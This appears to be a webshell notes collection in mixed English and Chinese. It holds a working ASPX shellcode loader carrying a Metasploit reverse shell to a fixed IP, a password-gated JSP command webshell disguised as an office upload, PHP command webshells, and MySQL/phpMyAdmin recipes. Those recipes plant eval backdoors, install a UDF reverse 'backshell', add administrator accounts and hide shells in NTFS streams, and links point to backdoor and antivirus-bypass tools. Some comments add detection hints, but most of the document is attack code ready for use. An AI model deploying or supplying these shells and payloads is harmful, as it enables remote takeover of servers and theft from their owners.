shellcode.aspx
<%@ Page Language="C#" AutoEventWireup="true" Inherits="System.Web.UI.Page" %>
<%@ Import Namespace="System" %>
<%@ Import Namespace="System.Runtime.InteropServices" %>
<script runat="server">
    // Analysis note: this is an in-process shellcode loader dressed up as an
    // ASP.NET page. Every request to it runs the embedded bytes inside the
    // IIS worker process (presumably w3wp.exe), under the application pool
    // identity.

    // Delegate type used to call the shellcode buffer as if it were a
    // function returning int.
    delegate int MsfpayloadProc();

    // Page_Load: allocate RWX memory, copy the shellcode in, call it, then
    // free the buffer. The call blocks the request thread for as long as the
    // payload runs (for a reverse shell, until the remote side disconnects).
    protected void Page_Load(object sender, EventArgs e)
    {
        byte[] codeBytes = {
            //msfpayload windows/shell_reverse_tcp LHOST=192.168.1.115 LPORT=53 X C
            // Indicators readable straight from the bytes below (32-bit
            // Windows shellcode; the generator comment above says the same):
            //   0x68,0x63,0x6d,0x64,0x00  -> push "cmd\0"       (process spawned)
            //   0x68,0xc0,0xa8,0x01,0x73  -> push 192.168.1.115 (LHOST)
            //   0x68,0x02,0x00,0x00,0x35  -> push AF_INET + port 0x0035 = 53 (LPORT)
            // On the host side the pair "VirtualAlloc with PAGE_EXECUTE_READWRITE
            // from the web worker, then an outbound TCP/53 session" is the
            // behaviour to hunt for.
            0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,
            0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,
            0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,
            0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,
            0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,
            0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,
            0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,
            0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,
            0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,
            0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,
            0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,
            0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,
            0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,
            0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,
            0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
            0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,
            0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,
            0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,
            0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,
            0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,
            0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,
            0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,
            0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,
            0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,
            0x01,0x73,0x68,0x02,0x00,0x00,0x35,0x89,
            0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,
            0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,
            0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,
            0xa2,0x56,0xff,0xd5,0x68,0x63,0x6d,0x64,
            0x00,0x89,0xe3,0x57,0x57,0x57,0x31,0xf6,
            0x6a,0x12,0x59,0x56,0xe2,0xfd,0x66,0xc7,
            0x44,0x24,0x3c,0x01,0x01,0x8d,0x44,0x24,
            0x10,0xc6,0x00,0x44,0x54,0x50,0x56,0x56,
            0x56,0x46,0x56,0x4e,0x56,0x56,0x53,0x56,
            0x68,0x79,0xcc,0x3f,0x86,0xff,0xd5,0x89,
            0xe0,0x4e,0x56,0x46,0xff,0x30,0x68,0x08,
            0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,
            0xa2,0x56,0x68,0xa6,0x95,0xbd,0x9d,0xff,
            0xd5,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,
            0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
            0x00,0x53,0xff,0xd5 };
        IntPtr handle = IntPtr.Zero;
        // NOTE(review): the allocation result is never checked. If VirtualAlloc
        // fails, handle stays IntPtr.Zero and it is the Marshal.Copy below that
        // fails, not this call — TODO confirm how that surfaces in the response.
        handle = VirtualAlloc(
            IntPtr.Zero,
            codeBytes.Length,
            MEM_COMMIT | MEM_RESERVE,
            PAGE_EXECUTE_READWRITE);
        try
        {
            // Copy the bytes into the RWX buffer and jump to them through a
            // managed delegate; the int return value is discarded.
            Marshal.Copy(codeBytes, 0, handle, codeBytes.Length);
            MsfpayloadProc msfpayload =
                Marshal.GetDelegateForFunctionPointer(handle, typeof(MsfpayloadProc)) as MsfpayloadProc;
            msfpayload();
        }
        finally
        {
            // Release the buffer once the payload returns (size 0 is what
            // MEM_RELEASE requires).
            VirtualFree(handle, 0, MEM_RELEASE);
        }
    }

    //Windows API
    // P/Invoke imports. A VirtualAlloc import next to PAGE_EXECUTE_READWRITE
    // inside a web page is itself a strong static indicator for file scanners.
    [DllImport("Kernel32.dll", EntryPoint = "VirtualAlloc")]
    public static extern IntPtr VirtualAlloc(IntPtr address, int size, uint allocType, uint protect);
    [DllImport("Kernel32.dll", EntryPoint = "VirtualFree")]
    public static extern bool VirtualFree(IntPtr address, int size, uint freeType);

    //flags
    const uint MEM_COMMIT = 0x1000;
    const uint MEM_RESERVE = 0x2000;
    const uint PAGE_EXECUTE_READWRITE = 0x40;
    const uint MEM_RELEASE = 0x8000;
</script>
DBSTEP V3.0 355 0 666 DBSTEP=OKMLlKlV
OPTION=S3WYOSWLBSGr
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
CREATEDATE=wUghPB3szB3Xwg66
RECORDID=qLSGw4SXzLeGw4V3wUw3zUoXwid6
originalFileId=wV66
originalCreateDate=wUghPB3szB3Xwg66
FILENAME=qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdN1liN4KXwiVGzfT2dEg6
needReadFile=yRWZdAS6
originalCreateDate=wLSGP4oEzLKAz4=iz=66
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%>
<%--
  Analysis note: the ten key=value lines above are a "DBSTEP V3.0" document
  envelope, presumably so the file passes as an office-document upload to an
  OA file handler — confirm against the upload endpoint that accepted it.
  The JSP below is a password-gated command-execution webshell; the envelope
  text is plain template text, so it is echoed into the response and has no
  effect on the Java code.
--%>
<%!
// Runs `c` through Runtime.exec and returns whatever the child wrote to
// standard output, one readLine() per line, newline-joined.
// Only stdout is read and the process is never waited for, so stderr-only
// failures come back empty. Any exception (including exec rejecting a
// null or empty command) is swallowed and its message returned as output.
public static String excuteCmd(String c) {
    StringBuilder line = new StringBuilder();
    try
    {
        Process pro = Runtime.getRuntime().exec(c);
        BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));
        String temp = null;
        while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}
        buf.close();
    }
    catch (Exception e)
    {
        line.append(e.getMessage());
    }
    return line.toString();
}
%>

<%
// Request contract — usable directly as a WAF/log signature: `pwd` must equal
// the hard-coded literal "asasd33445" and `cmd` must not be the empty string.
// A missing `cmd` is null, which passes the `!"".equals(...)` check and
// reaches exec (where it fails and the message is echoed instead).
// Matching requests get the command output inside <pre>; every other request
// gets the fixed ":-)" body, which fingerprints the shell on disk as well.
if
("asasd33445".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd")))
{
    out.println("<pre>"+excuteCmd(request.getParameter("cmd")) + "</pre>");
}
else
{out.println(":-)");}
%>
<%-- 32 hex characters trailing the page; looks like an MD5-style checksum
     footer of the envelope format rather than JSP — confirm. --%>
6e4f045d4b8506bf492ada7e3390d7ce
PHP 绕过写入WebShell - 死亡exit
<?php
// Vulnerable file-write sink (the "死亡exit" / exit-prefix pattern).
// The hard-coded `<?php exit; ?>` prefix is meant to stop anything appended
// after it from running when the written file is later requested, but both
// the destination path ($_POST['filename']) and the body ($_POST['txt']) come
// straight from the request, so this is an arbitrary file write under the
// web server's identity regardless of the prefix.
// Mitigation is not a stronger prefix: never take the path from the request,
// write under a fixed directory outside the document root with a generated
// name, and treat the exit-prefix trick as offering no protection.
$content = '<?php exit; ?>';
$content .= $_POST['txt'];
file_put_contents($_POST['filename'], $content);
cmd形式WebShell
<?php
// Minimal command-execution webshell with no authentication at all.
// Flow: if a `cmd` parameter is present (GET or POST, and cookies too
// depending on request_order, since $_REQUEST is used) it is handed
// unmodified to system() and the output is echoed inside <pre> tags.
// The commented-out `die` means page rendering continues after the command.
// Detection: PHP files passing $_REQUEST/$_GET/$_POST values to system(),
// web logs carrying a `cmd=` parameter, and the web-server user spawning a
// shell as a child of the PHP worker.
if(isset($_REQUEST['cmd'])){
    echo "<pre>";
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    echo "</pre>";
    // die;
}
?>
Webshell - 利用
(1)站长工具 Webshell常常被站长用于网站管理、服务器管理等,根据FSO权限的不同,作用有在线编辑网页脚本、上传下载文件、查看数据库、执行任意程序命令等。 (2)持续远程访问 入侵者可以利用webshell达到长期控制网站服务器的目的;若攻击者自行修复了漏洞,以确保没有其他人会利用该漏洞,攻击者就可以低调地随时控制服务器。一些流行的webshell使用密码验证和其他技术来确保只有上传webshell的攻击者才能访问它。(webshell密码爆破工具表示不服) (3)权限提升 在服务器没有配置错误的情况下,webshell将在web服务器的用户权限下运行,该用户权限是有限的。通过使用webshell,攻击者可以尝试利用系统上的本地漏洞来进行权限提升,常见的有查找敏感配置文件、通过内核漏洞提权、利用低权限用户目录下可被Root权限用户调用的脚本提权、任务计划等(从入门到放弃) (4)极强的隐蔽性 有些恶意网页脚本可以嵌套在正常网页中运行,且不容易被查杀。webshell还可以穿越服务器防火墙:由于与被控制的服务器或远程主机交互的数据都通过80端口传递,因此不会被防火墙拦截;在没有记录流量的情况下,webshell使用POST包发送,也不会被记录在系统日志中,只会在web日志中记录一些数据提交的记录。
WebShell - 检测
https://www.freebuf.com/articles/web/183520.html
Mysql写入Webshell
一句话 Select '<?php eval($_POST[cmd])?>' into outfile '物理路径'; and 1=2 union all select 一句话HEX值 into outfile '路径'; 表形式 CREATE TABLE `mysql`.`darkmoon` (`darkmoon1` TEXT NOT NULL ); INSERT INTO `mysql`.`darkmoon` (`darkmoon1` ) VALUES ('<?php @eval($_POST[pass]);?>'); SELECT `darkmoon1` FROM `darkmoon` INTO OUTFILE '路径'; DROP TABLE IF EXISTS `darkmoon`;
phpmyadmin root账号获取Webshell
1.直接读取后门文件 通过程序报错、phpinfo函数、程序配置表等直接获取网站真实路径,有些网站前期已经被人渗透过,因此在目录下留有后门文件通过load_file直接读取。 2.直接导出一句话后门 前提需要知道网站的真实物理路径,例如网站真实路径D:\work\WWW,则可以通过执行以下查询,来获取一句话后门文件cmd.php,访问地址 http://www.somesite.com/cmd.php select '<?php @eval($_POST[antian365]);?>' INTO OUTFILE 'D:/work/WWW/antian365.php' 3.创建数据库导出一句话后门 在查询窗口直接执行以下代码即可,跟2.原理类似。 CREATE TABLE `mysql`.`antian365` (`temp` TEXT NOT NULL ); INSERT INTO `mysql`.`antian365` (`temp` ) VALUES('<?php @eval($_POST[antian365]);?>'); SELECT `temp` FROM `antian365` INTO OUTFILE 'D:/www/antian365.php'; DROP TABLE IF EXISTS `antian365`; 4.可执行命令方式 创建执行命令形式的shell,但前提是对方未关闭系统函数。该方法导出成功后可以直接执行DOS命令,使用方法:www.xxx.com/antian365.php?cmd=(cmd=后面直接执行dos命令)。 select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'd:/www/antian365.php' 另外在linux下可以导出直接执行命令的shell: SELECT '<? system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php'; http://localhost/shell.php?c=cat%20/etc/passwd 5.过杀毒软件方式 通过后台或者存在上传图片的地方,上传图片publicguide.jpg,内容如下: <?php $a=' PD9waHAgQGV2YWwoJF9QT1NUWyd hbnRpYW4zNjUnXSk7ZGllKCk7Pz4= '; error_reporting(0); 6.修改mysql.txt Mysql.txt为udf.dll的二进制文件转成十六进制代码。 (1)先执行导入ghost表中的内容 修改以下代码的末尾代码 select backshell("YourIP",4444); (2)导出文件到某个目录 select data from Ghost into dumpfile 'c:/windows/mysqldll.dll'; select data from Ghost into dumpfile 'c:/windows/system32/mysqldll'; select data from Ghost into dumpfile 'c:/phpStudy/MySQL/lib/plugin/mysqldll'; select data from Ghost into dumpfile 'E:/PHPnow-1.5.6/MySQL-5.0.90/lib/plugin/mysqldll'; select data from Ghost into dumpfile 'C:/websoft/MySQL/MySQL Server 5.5/lib/plugin/mysqldll.dll' select data from Ghost into dumpfile 'D:/phpStudy/MySQL/lib/plugin/mysqldll.dll'; select load_file('C:/ProgramData/MySQL/ MySQL Server 5.1/Data/mysql/user.frm'); select data from Ghost into dumpfile 'C:\Program Files\MySQL\MySQL Server 5.1\lib/plugin/mysqldll.dll' (3)查看FUNCTION中是否存在cmdshell和backshell 存在则删除: drop FUNCTION cmdshell;//删除cmdshell drop FUNCTION backshell;//删除backshell 
创建backshell: CREATE FUNCTION backshell RETURNS STRING SONAME 'mysqldll.dll'; //创建backshell 在具备独立主机的服务器上执行监听: nc -vv -l -p 44444 执行查询: select backshell("192.192.192.1",44444);//修改192.192.192.1为你的IP和端口 4.获取webshell后添加用户命令 注意如果不能直接执行,则需要到c:\windows\system32\下执行 net user antian365 www.xianzhi.aliyun.com /add net localgroup administrators antian365 @set_time_limit(0); eval("?>".base64_decode($a)); ?> 然后通过图片包含temp.php,导出webshell。 select '<?php include 'publicguide.jpg' ?>' INTO OUTFILE 'D:/work/WWW/antian365.php' 一句话后门密码:antian365 6.直接导出加密webshell 一句话后门文件密码:pp64mqa2x1rnw68,执行以下查询直接导出加密webshell,D:/WEB/IPTEST/22.php,注意在实际过程需要修改D:/WEB/IPTEST/22.php。 注意: 也可以使用 http://tool.lu/hexstr/ 网站的代码转换来实现,将需要导出的文件代码复制到网站的字符串中,通过字符串转成十六进制,将十六进制字符串放入unhex函数进行查询即可: select unhex('十六进制字符串') into dumpfile 'D:/WEB/shell.php' 7.CMS系统获取webshell 有些情况下无法获取网站的真实路径,则意味着无法直接导出一句话webshell,可以通过CMS系统管理账号登录系统后,寻找漏洞来突破,例如dedecms则可以通过破解管理员账号后直接上传文件来获取webshell。Discuz!的UC_key可以直接获取webshell。甚至某些系统可以直接上传php文件。下面是一些CMS系统渗透的技巧: dedecms系统的密码有直接md5,也有20位的密码,如果是20位的密码则需要去掉密码中的前3位和最后1位,然后对剩余的值进行md5解密即可; phpcms v9版本的密码需要加salt进行破解,需要选择破解算法md5(md5($pass).$salt)进行破解。 Discuz!论坛帐号保存在ucenter_members(Discuz7.X及以上版本)或者cdb_members(discuz6.x版本)表中,其破解需要带salt进行,其破解时是使用password:salt进行,例如a0513df9929afc972f024fa4e586e829:399793。 8.general_log_file获取webshell (1)查看genera文件配置情况 show global variables like "%genera%"; (2)关闭general_log set global general_log=off; (3)通过general_log选项来获取webshell set global general_log='on'; SET global general_log_file='D:/phpStudy/WWW/cmd.php'; 在查询中执行语句: SELECT '<?php assert($_POST["cmd"]);?>'; Shell为cmd.php,一句话后门,密码为cmd。
后门生成工具
evil kali可装 ew http://rootkiter.com/EarthWorm http://rootkiter.com/Termite/ --后者新版 nc lcx netsh --windows msf
bypass360 http://lu4n.com/metasploit-payload-bypass-av-note/ http://hacktech.cn/2017/04/20/msf-AntiVirus.html
MSSQL写入Webshell
echo ^<?php @eval(request[xxx])? ^^>^ >路径
WebShell查杀
安全狗
Freebuf
D盾
青藤云
WebShell隐藏 - Windows
NTFS中的ADS(交换数据流)
select 'xxx' into outfile 'D:\\mysql\\lib::$INDEX_ALLOCATION';
echo ^<?php @eval(request[xxx])? ^>> index.php:a.jpg
驱动隐藏
系统保留文件名
畸形文件夹
属性隐藏
Linux终端解析“\r”
不死马
ASPX编译dll
添加用户并并隐藏 - powershell
RDP记录获取 - powershell - https://rcoil.me/
安装后门
https://github.com/tom0li/security_circle/blob/master/15288418585142.md --基于bash
https://github.com/deepzec/Grok-backdoor --基于python